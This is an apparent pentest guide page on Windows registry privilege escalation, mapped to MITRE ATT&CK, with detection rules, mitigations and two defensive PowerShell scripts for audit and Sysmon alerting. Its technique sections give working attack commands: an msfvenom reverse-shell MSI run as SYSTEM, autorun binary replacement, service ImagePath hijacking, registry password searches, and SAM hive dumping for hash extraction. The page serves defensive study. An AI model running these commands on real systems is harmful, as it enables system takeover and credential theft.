Registry Exploits

Overview

The Windows registry stores system and application configuration. Misconfigured registry permissions, credentials stored in the registry, and policy settings such as AlwaysInstallElevated all provide privilege escalation paths. Registry-based attacks are reliable because they target persistent configuration rather than transient conditions.

ATT&CK Mapping

  • Tactic: TA0004 - Privilege Escalation
  • Technique: T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys
  • Technique: T1574.011 - Hijack Execution Flow: Services Registry Permissions Weakness

Prerequisites

  • Shell access on the target Windows system
  • Registry read access (default for all authenticated users)
  • Writable registry keys (for exploitation)

Techniques

AlwaysInstallElevated

When both AlwaysInstallElevated values (one under HKLM, one under HKCU) are set to 1, Windows Installer runs every MSI package with SYSTEM privileges, so any user can install a package as SYSTEM:

:: Check if AlwaysInstallElevated is enabled
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

:: Both must return 0x1 for the exploit to work

If both are set to 1:

# On attacker machine, generate a malicious MSI
# Metasploit Framework
# https://github.com/rapid7/metasploit-framework
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f msi -o escalate.msi
:: On target, install the MSI (runs as SYSTEM)
msiexec /quiet /qn /i C:\Users\Public\escalate.msi

Autorun Registry Keys

If autorun registry entries point to binaries in writable locations:

:: Check autorun locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

:: Check permissions on the referenced binaries
icacls "C:\Path\To\autorun.exe"

:: If writable, replace with payload
move "C:\Path\To\autorun.exe" "C:\Path\To\autorun.exe.bak"
copy payload.exe "C:\Path\To\autorun.exe"

:: Escalation occurs when the privileged user (or SYSTEM) logs in and the autorun executes

Service Registry Permissions

Each service has a registry key under HKLM\SYSTEM\CurrentControlSet\Services\. If a user can modify a service's registry key, they can change the ImagePath value; the next time the service starts, the Service Control Manager launches the new binary in the service's own account (often LocalSystem):

:: Check registry permissions on a service
:: Using accesschk (Sysinternals)
accesschk.exe /accepteula -uvwqk "HKLM\SYSTEM\CurrentControlSet\Services\VulnerableService"

:: Look for: KEY_ALL_ACCESS or KEY_SET_VALUE for non-admin users

:: Modify the service binary path via registry
reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnerableService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Public\payload.exe" /f

:: Restart the service
sc stop VulnerableService
sc start VulnerableService
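The following PowerShell audit is an added example written for this page (not code from the original) covering both the AlwaysInstallElevated check and the service registry permission check above; it reads the two policy values and lists every service key on which a principal other than SYSTEM, Administrators, TrustedInstaller or CREATOR OWNER holds write rights. Run it from an administrator session so all service keys are readable.

```powershell
# Added audit example, not code from the original page. Run from an
# administrator PowerShell session; it reports the two conditions above.

function Test-AlwaysInstallElevated {
    # Exploitable only when BOTH policy values are 1; a missing value counts as 0.
    $paths = @('HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
               'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer')
    $values = foreach ($p in $paths) {
        $v = (Get-ItemProperty -Path $p -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        if ($null -eq $v) { 0 } else { [int]$v }
    }
    return ($values -notcontains 0)
}

function Get-WeakServiceKeyAcl {
    # Rights that allow a principal to rewrite ImagePath or other service values.
    $writeRights = [int]([System.Security.AccessControl.RegistryRights]::SetValue -bor
                         [System.Security.AccessControl.RegistryRights]::WriteKey -bor
                         [System.Security.AccessControl.RegistryRights]::FullControl)
    # Principals expected to hold write access on service keys.
    $trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                 'NT SERVICE\TrustedInstaller', 'CREATOR OWNER')
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
      ForEach-Object {
        $key = $_
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { return }   # key not readable by this session; skip it
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($trusted -contains $ace.IdentityReference.Value) { continue }
            # Caveat: generic access masks (e.g. GENERIC_ALL) are not expanded here.
            if (([int]$ace.RegistryRights -band $writeRights) -ne 0) {
                [pscustomobject]@{
                    Service   = $key.PSChildName
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.RegistryRights
                    Inherited = $ace.IsInherited
                }
            }
        }
      }
}

if (Test-AlwaysInstallElevated) { Write-Warning 'AlwaysInstallElevated is enabled in both HKLM and HKCU' }
else { Write-Output 'AlwaysInstallElevated: not enabled' }
Get-WeakServiceKeyAcl | Format-Table -AutoSize
```

Each row returned by Get-WeakServiceKeyAcl is a service key whose ACL should be reviewed against the mitigation list at the end of this page.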

Stored Credentials in Registry

:: Autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon

:: PuTTY stored sessions (may contain proxy credentials)
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s

:: VNC passwords (DES-encrypted)
reg query "HKLM\SOFTWARE\RealVNC\WinVNC4" /v Password
reg query "HKCU\SOFTWARE\TightVNC\Server" /v Password

:: SNMP community strings
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities"

:: Search registry for "password"
reg query HKLM /f password /t REG_SZ /s 2>nul | findstr /i "password"
reg query HKCU /f password /t REG_SZ /s 2>nul | findstr /i "password"

SAM and SYSTEM Hive Backup

:: Requires SYSTEM, or an account holding SeBackupPrivilege (for example, members of Backup Operators)
reg save HKLM\SAM C:\Users\Public\sam
reg save HKLM\SYSTEM C:\Users\Public\system

:: Check for Volume Shadow Copies (may contain old SAM)
vssadmin list shadows

# On attacker machine — extract hashes
# Impacket
# https://github.com/fortra/impacket
impacket-secretsdump -sam sam -system system LOCAL

Detection Methods

Network-Based Detection

  • Not directly observable on the network

Host-Based Detection

  • Monitor registry modification events (Sysmon Event ID 13, Registry Value Set; Sysmon Event ID 12 covers key creation and deletion, and Windows Security Event ID 4657 records value changes when registry object-access auditing is configured)
  • Alert on modifications to service registry keys by non-admin users
  • Monitor AlwaysInstallElevated policy changes
  • Audit access to the HKLM\SAM and HKLM\SECURITY hives, and alert on reg save of these hives and on vssadmin list shadows in process-creation events (Sysmon Event ID 1, Security Event ID 4688)
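The following PowerShell is an added example (not part of the original page) that applies the host-based rules above to Sysmon Event ID 13 records. The four events, the user CORP\jdoe, the service name VulnerableService and the file paths are constructed for illustration; in production the records would come from Get-WinEvent on the Microsoft-Windows-Sysmon/Operational log.

```powershell
# Added detection example, not code from the original page. The events below
# are constructed Sysmon Event ID 13 (Registry Value Set) records, reduced to
# the fields the rules use.

$sampleEvents = @(
    @{ User = 'CORP\jdoe';           Image = 'C:\Windows\System32\reg.exe'
       TargetObject = 'HKLM\System\CurrentControlSet\Services\VulnerableService\ImagePath'
       Details = 'C:\Users\Public\payload.exe' },
    @{ User = 'NT AUTHORITY\SYSTEM'; Image = 'C:\Windows\System32\services.exe'
       TargetObject = 'HKLM\System\CurrentControlSet\Services\Spooler\Start'
       Details = 'DWORD (0x00000002)' },
    @{ User = 'CORP\jdoe';           Image = 'C:\Windows\System32\reg.exe'
       TargetObject = 'HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated'
       Details = 'DWORD (0x00000001)' },
    @{ User = 'CORP\jdoe';           Image = 'C:\Windows\System32\reg.exe'
       TargetObject = 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater'
       Details = 'C:\Users\jdoe\AppData\Local\Temp\u.exe' }
)

function Get-RegistryAlerts {
    param([object[]]$Events)
    $systemAccounts = @('NT AUTHORITY\SYSTEM', 'NT AUTHORITY\LOCAL SERVICE', 'NT AUTHORITY\NETWORK SERVICE')
    foreach ($e in $Events) {
        $reason = $null
        if ($e.TargetObject -match '^HKLM\\System\\CurrentControlSet\\Services\\[^\\]+\\ImagePath$' -and
            $systemAccounts -notcontains $e.User) {
            # Rule 1: a service ImagePath rewritten by something other than a service account
            $reason = 'Service ImagePath changed by non-system account'
        }
        elseif ($e.TargetObject -match '\\Windows\\Installer\\AlwaysInstallElevated$' -and
                $e.Details -match '0x0*1\)$') {
            # Rule 2: the AlwaysInstallElevated policy switched on in either hive
            $reason = 'AlwaysInstallElevated enabled'
        }
        elseif ($e.TargetObject -match '\\CurrentVersion\\(Run|RunOnce)\\' -and
                $e.Details -match '\\(Temp|Public|AppData)\\') {
            # Rule 3: a Run/RunOnce entry pointing at a user-writable location
            $reason = 'Run key points to a user-writable path'
        }
        if ($reason) {
            [pscustomobject]@{ Reason = $reason; User = $e.User; Image = $e.Image
                               Target = $e.TargetObject; Details = $e.Details }
        }
    }
}

Get-RegistryAlerts -Events $sampleEvents | Format-Table -AutoSize
```

The Spooler Start change made by SYSTEM through services.exe is routine and produces no alert, which is the noise the account and path conditions are there to remove.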

Mitigation Strategies

  • Disable AlwaysInstallElevated — set the "Always install with elevated privileges" policy to Disabled under both Computer Configuration and User Configuration (Administrative Templates > Windows Components > Windows Installer), so that both registry values are 0 or not present
  • Restrict service registry permissions — service keys should be writable only by Administrators and SYSTEM
  • Do not store credentials in registry — disable autologon, use credential managers
  • Restrict autorun paths — ensure autorun binaries are in protected directories
  • Monitor registry changes — use Sysmon or similar tools to track registry modifications

References

Pentest Guides & Research

MITRE ATT&CK